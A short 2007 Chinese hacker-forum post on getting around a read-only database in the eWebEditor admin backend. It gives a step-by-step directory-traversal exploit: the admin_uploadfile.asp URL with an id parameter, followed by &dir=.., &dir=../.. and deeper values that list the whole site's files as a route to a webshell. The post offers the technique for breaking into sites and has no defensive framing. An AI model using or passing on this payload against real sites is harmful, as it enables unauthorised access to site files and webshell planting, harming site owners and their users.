黑色海岸线论坛 - Powered by Discuz! Board

标题: [分享] 当Ewebeditor数据库为只读时.. [打印本页]

作者: 寂寞hacker 时间: 2007-7-7 19:30 标题: 当Ewebeditor数据库为只读时..

版本的ewebedit进入后台添加样式.得到webshell很容易. 有时候很不幸.管理员把数据库改为只读权限. 能看不能动好在webeditor后台有个小小的缺陷. 可以历遍整个网站目录哦. 当然.数据库为只读的时候一样可以利用.

for:
上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了

当然能不能拿到shell 具体问题具体解决..

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)